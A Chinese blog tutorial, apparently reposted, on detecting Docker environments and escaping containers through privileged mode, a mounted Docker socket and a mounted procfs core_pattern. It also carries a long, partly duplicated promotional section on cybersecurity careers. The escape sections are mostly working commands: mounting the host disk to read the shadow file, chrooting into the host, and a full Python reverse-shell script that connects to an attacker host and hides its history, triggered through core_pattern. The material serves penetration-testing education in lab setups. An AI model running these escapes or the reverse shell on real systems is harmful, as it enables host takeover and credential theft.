当前位置:   article > 正文

云上攻防-云原生篇&Docker安全&权限环境检测&容器逃逸&特权模式&危险挂载_docker.sock 挂载

docker.sock 挂载
文章目录
  • 前言
  • * 1、Docker是干嘛的?
    
    • 1
    • 2、Docker对于渗透测试影响?
    • 3、Docker渗透测试点有那些?
    • 4、前渗透-判断在Docker中
    •   * 方式一:查询cgroup信息
      
      • 1
      • 方式二:检查/.dockerenv文件
      • 方式三:检查mount信息
      • 方式四:查看硬盘信息
      • 方式五:查看文件系统以及挂载点
    • 5、前渗透-镜像中的应用漏洞
    • 6、前渗透-镜像中的默认配置
    • 7、后渗透-三种安全容器逃逸
  • 容器逃逸-特权模式
  • 容器逃逸-危险挂载
  • * 1、挂载Docker Socket逃逸
    
    • 1
    • 2、挂载宿主机procfs逃逸

前言

1、Docker是干嘛的?

Docker
是一个开放源代码软件,是一个开放平台,用于开发应用、交付(shipping)应用、运行应用。Docker允许用户将基础设施(Infrastructure)中的应用单独分割出来,形成更小的颗粒(容器),从而提高交付软件的速度。
Docker 容器与虚拟机类似,但二者在原理上不同,容器是将操作系统层虚拟化,虚拟机则是虚拟化硬件,因此容器更具有便携性、高效地利用服务器。

2、Docker对于渗透测试影响?

3、Docker渗透测试点有那些?

在这里插入图片描述

4、前渗透-判断在Docker中

没有权限:端口扫描详细信息,根据应用对象表现
但是想通过端口扫描判断对方是不是docker服务几乎是不可能的(我没遇到……)

拿到权限:

方式一:查询cgroup信息

docker中:
![在这里插入图片描述](https://img-
blog.csdnimg.cn/9dc99f1caef54f749679e9cc9085cc96.png)真实主机上:
在这里插入图片描述

方式二:检查/.dockerenv文件

通过判断根目录下的 .dockerenv文件是否存在,可以简单的识别docker环境
docker中:
![在这里插入图片描述](https://img-
blog.csdnimg.cn/71655069c5c9491b993b6b2a2ec560c7.png)真实主机上:
在这里插入图片描述
不过有一点需要注意的是,如果你获取的shell权限过小的话(www-data、或是某一服务的用户),根目录下也是不存在.dockerenv文件的
在这里插入图片描述

方式三:检查mount信息

利用mount查看挂载磁盘是否存在docker相关信息。

docker中:
![在这里插入图片描述](https://img-
blog.csdnimg.cn/c7190dacfd214553ad45756e90ecbe7b.png)真实主机上:
在这里插入图片描述

方式四:查看硬盘信息

fdisk -l 容器输出为空,非容器有内容输出。

docker中:
![在这里插入图片描述](https://img-
blog.csdnimg.cn/28a1e31bf84b44e4a38ed0a8732db369.png)真实主机上:
在这里插入图片描述

方式五:查看文件系统以及挂载点

df -h 检查文件系统挂载的目录,也能够简单判断是否为docker环境。

df -h | egrep '(overlay|aufs)'
  • 1

docker中:
在这里插入图片描述
真实主机上:
在这里插入图片描述

参考:https://blog.csdn.net/qq_23936389/article/details/131467165

5、前渗透-镜像中的应用漏洞

正常web渗透测试

6、前渗透-镜像中的默认配置

7、后渗透-三种安全容器逃逸

-特权模式启动导致(不安全启动 适用于java jsp高权限无需提权 还要提权才能逃逸)
-危险挂载启动导致(危险启动 适用于java jsp高权限无需提权 还要提权才能逃逸)
-docker自身&系统漏洞(软件漏洞和系统漏洞 都可用)
https://wiki.teamssix.com/CloudNative/
在这里插入图片描述

容器逃逸-特权模式

启动靶场:docker run --rm --privileged=true -it alpine
![在这里插入图片描述](https://img-
blog.csdnimg.cn/37ce367d332d450ab2e9f7a21eb6a8de.png)检测环境:cat /proc/1/cgroup |
grep -qi docker && echo “Is Docker” || echo “Not Docker”
![在这里插入图片描述](https://img-
blog.csdnimg.cn/a9ed35619afe4dfdaff645194d0c743f.png)判断特权:cat
/proc/self/status | grep CapEff
如果是以特权模式启动的话,CapEff 对应的掩码值应该为0000003fffffffff 或者是 0000001fffffffff
在这里插入图片描述
查看目录:fdisk -l
![在这里插入图片描述](https://img-
blog.csdnimg.cn/1020fbb6038d4dbab3dfcb9e0b20b9c0.png)特权逃逸:mkdir /test && mount
/dev/vda1 /test
![在这里插入图片描述](https://img-
blog.csdnimg.cn/220760b2c0e04e3e9a43931589d24fa5.png)判断结果:尝试访问宿主机 shadow
文件,可以看到正常访问
在这里插入图片描述

容器逃逸-危险挂载

1、挂载Docker Socket逃逸

启动靶场:docker run -itd --name with_docker_sock -v
/var/run/docker.sock:/var/run/docker.sock ubuntu
进入环境:docker exec -it with_docker_sock /bin/bash
检测环境:ls -lah /var/run/docker.sock
![在这里插入图片描述](https://img-
blog.csdnimg.cn/2c2c6c62dd9e4ec7aa10946be97dee4a.png)挂载逃逸:
apt-get update
apt-get install curl
curl -fsSL https://get.docker.com/ | sh
在容器内部创建一个新的容器,并将宿主机目录挂载到新的容器内部
docker run -it -v /:/host ubuntu /bin/bash
![在这里插入图片描述](https://img-
blog.csdnimg.cn/ac8cbc2fa73646acb9f6a6d6e141b3cc.png)chroot /host
在这里插入图片描述

2、挂载宿主机procfs逃逸

启动环境:docker run -it -v
/proc/sys/kernel/core_pattern:/host/proc/sys/kernel/core_pattern ubuntu
检测环境:find / -name core_pattern
![在这里插入图片描述](https://img-
blog.csdnimg.cn/8d151c383e2b4a10b171b80fbe0ef401.png)找到当前容器在宿主机下的绝对路径

cat /proc/mounts | xargs -d ',' -n 1 | grep workdir
  • 1

![在这里插入图片描述](https://img-
blog.csdnimg.cn/d84cd5ff763a4540883f7becedb93311.png)这就表示当前绝对路径为

/var/lib/docker/overlay2/5c86feb33aba7c5fc559bee1a7b47b1f8004e1f6f20db4b97d8efbfa4cc33a19/merged

创建一个反弹 Shell 的 py 脚本

cat >/tmp/.x.py << EOF
#!/usr/bin/python
import os
import pty
import socket
lhost = "xx.xx.xx.xx"
lport = xxxx
def main():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((lhost, lport))
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    os.putenv("HISTFILE", '/dev/null')
    pty.spawn("/bin/bash")
    os.remove('/tmp/.x.py')
    s.close()
if __name__ == "__main__":
    main()
EOF
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20

给 Shell 赋予执行权限

chmod 777 .x.py
  • 1

写入反弹 shell 到目标的 proc 目录下

echo -e "|/var/lib/docker/overlay2/ad9b33531057ae1736388c0198e80e49de165b12d9d16bd81fd44022cff0e72f/merged/tmp/.x.py \rcore    " >  /host/proc/sys/kernel/core_pattern
  • 1

在攻击主机上开启一个监听,然后在容器里运行一个可以崩溃的程序

cat >/tmp/x.c << EOF
#include <stdio.h>
int main(void)
{
    int *a = NULL;
    *a = 1;
    return 0;
}
EOF



gcc x.c -o t
./t
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14

![在这里插入图片描述](https://img-
blog.csdnimg.cn/00146b29b26b4dd88e89d0529305c5a0.png)不过我这里尝试了好几次都没有成功……

模拟真实场景:
1、高权限-Web入口到Docker逃逸(Java)

docker run --rm --privileged=true -it -p 8888:8080 vulfocus/shiro-721
  • 1

![在这里插入图片描述](https://img-
blog.csdnimg.cn/3fae5745c254424f9e6cc3efffb28e25.png)![在这里插入图片描述](https://img-
blog.csdnimg.cn/3b8bb3aa69574ec98861f75fef49d9ae.png)![在这里插入图片描述](https://img-
blog.csdnimg.cn/5056fae37416445ab692a20d616662f0.png)2、低权限-Web入口到Docker逃逸(PHP)

docker run --rm --privileged=true -it -p 8080:80 sagikazarmark/dvwa
  • 1

java大部分都是高权限,php需提权……

题外话

初入计算机行业的人或者大学计算机相关专业毕业生,很多因缺少实战经验,就业处处碰壁。下面我们来看两组数据:

2023届全国高校毕业生预计达到1158万人,就业形势严峻;

国家网络安全宣传周公布的数据显示,到2027年我国网络安全人员缺口将达327万。

一方面是每年应届毕业生就业形势严峻,一方面是网络安全人才百万缺口。

6月9日,麦可思研究2023年版就业蓝皮书(包括《2023年中国本科生就业报告》《2023年中国高职生就业报告》)正式发布。

2022届大学毕业生月收入较高的前10个专业

本科计算机类、高职自动化类专业月收入较高。2022届本科计算机类、高职自动化类专业月收入分别为6863元、5339元。其中,本科计算机类专业起薪与2021届基本持平,高职自动化类月收入增长明显,2022届反超铁道运输类专业(5295元)排在第一位。

具体看专业,2022届本科月收入较高的专业是信息安全(7579元)。对比2018届,电子科学与技术、自动化等与人工智能相关的本科专业表现不俗,较五年前起薪涨幅均达到了19%。数据科学与大数据技术虽是近年新增专业但表现亮眼,已跻身2022届本科毕业生毕业半年后月收入较高专业前三。五年前唯一进入本科高薪榜前10的人文社科类专业——法语已退出前10之列。

“没有网络安全就没有国家安全”。当前,网络安全已被提升到国家战略的高度,成为影响国家安全、社会稳定至关重要的因素之一。

网络安全行业特点

1、就业薪资非常高,涨薪快 2022年猎聘网发布网络安全行业就业薪资行业最高人均33.77万!

img

2、人才缺口大,就业机会多

2019年9月18日《中华人民共和国中央人民政府》官方网站发表:我国网络空间安全人才 需求140万人,而全国各大学校每年培养的人员不到1.5W人。猎聘网《2021年上半年网络安全报告》预测2027年网安人才需求300W,现在从事网络安全行业的从业人员只有10W人。
img

行业发展空间大,岗位非常多

网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…

职业增值潜力大

网络安全专业具有很强的技术特性,尤其是掌握工作中的核心网络架构、安全技术,在职业发展上具有不可替代的竞争优势。

随着个人能力的不断提升,所从事工作的职业价值也会随着自身经验的丰富以及项目运作的成熟,升值空间一路看涨,这也是为什么受大家欢迎的主要原因。

从某种程度来讲,在网络安全领域,跟医生职业一样,越老越吃香,因为技术愈加成熟,自然工作会受到重视,升职加薪则是水到渠成之事。

黑客&网络安全如何学习

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

1.学习路线图

行业发展空间大,岗位非常多

网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…

职业增值潜力大

网络安全专业具有很强的技术特性,尤其是掌握工作中的核心网络架构、安全技术,在职业发展上具有不可替代的竞争优势。

随着个人能力的不断提升,所从事工作的职业价值也会随着自身经验的丰富以及项目运作的成熟,升值空间一路看涨,这也是为什么受大家欢迎的主要原因。

从某种程度来讲,在网络安全领域,跟医生职业一样,越老越吃香,因为技术愈加成熟,自然工作会受到重视,升职加薪则是水到渠成之事。

黑客&网络安全如何学习

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

1.学习路线图

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。

内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。

3.技术文档和电子书

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

img

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/Li_阴宅/article/detail/934517
推荐阅读
相关标签